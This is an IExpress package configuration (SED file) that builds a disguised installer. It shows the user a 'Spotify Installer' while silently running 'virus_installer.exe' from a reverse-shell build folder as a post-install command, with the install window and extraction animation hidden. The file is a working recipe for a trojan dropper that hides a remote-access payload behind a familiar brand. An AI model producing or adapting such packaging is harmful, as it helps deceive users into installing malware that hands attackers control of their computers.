[Version]
Class=IEXPRESS
SEDVersion=3
[Options]
PackagePurpose=InstallApp
ShowInstallProgramWindow=0
HideExtractAnimation=1
UseLongFileName=0
InsideCompressed=0
CAB_FixedSize=0
CAB_ResvCodeSigning=0
RebootMode=IS
InstallPrompt=%InstallPrompt%
DisplayLicense=%DisplayLicense%
FinishMessage=%FinishMessage%
TargetName=%TargetName%
FriendlyName=%FriendlyName%
AppLaunched=%AppLaunched%
PostInstallCmd=%PostInstallCmd%
AdminQuietInstCmd=%AdminQuietInstCmd%
UserQuietInstCmd=%UserQuietInstCmd%
SourceFiles=SourceFiles
[Strings]
InstallPrompt=
DisplayLicense=
FinishMessage=
TargetName=C:\Users\User\Desktop\Virus Installer.EXE
FriendlyName=Spotify Installer
AppLaunched=SpotifySetup.exe
PostInstallCmd=virus_installer.exe
AdminQuietInstCmd=
UserQuietInstCmd=
FILE0="SpotifySetup.exe"
FILE1="virus_installer.exe"
[SourceFiles]
SourceFiles0=C:\Users\User\Desktop\
SourceFiles1=C:\Users\User\Desktop\Reverse-Shell\dist\
[SourceFiles0]
%FILE0%=
[SourceFiles1]
%FILE1%=
